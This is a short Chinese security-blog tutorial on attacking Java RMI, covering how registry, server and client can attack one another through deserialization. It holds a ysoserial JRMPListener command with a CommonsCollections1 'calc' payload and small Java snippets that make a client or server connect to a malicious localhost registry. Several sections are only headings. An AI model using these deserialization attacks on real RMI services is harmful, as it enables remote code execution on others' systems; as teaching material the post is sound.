java安全-02RMI

阅读量274079

发布时间 : 2022-04-06 10:30:04

 

基础知识

  • 动态代理
  • 反射

 

攻击方式

注册端攻击服务端

java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
    public static void main(String[] args) throws RemoteException, MalformedURLException, NotBoundException, RemoteException {
        //开启一个恶意的reg,然后server去过去链接注册,则会中招
        String url = "rmi://127.0.0.1:1099/setUser";
        Naming.unbind(url);
    }

注册端攻击客户端

    public static void main(String[] args) {
        //PS F:\tools\EXP> java -cp .\ysoserial-master-8eb5cbfbf6-1.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 "calc"
        try{
            String url = "rmi://127.0.0.1:1099/exp";
            User user = (User) Naming.lookup(url);

        }catch(Exception e){
            e.printStackTrace();
        }
    }

服务端攻击注册端

注册端开启

Server端利用CC1进行攻击

服务端攻击客户端

服务端将恶意类注册

客户端加载执行

本文由雷石安全实验室原创发布

转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/271354

安全客 - 有思想的安全新媒体

分享到:微信
+12赞
收藏
雷石安全实验室
分享到:微信

发表评论

雷石安全实验室

欢迎关注公众号@雷石安全实验室 安全工作者不定期分享渗透、APT、企业安全建设等新鲜干货

  • 文章
  • 48
  • 粉丝
  • 44

热门推荐

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66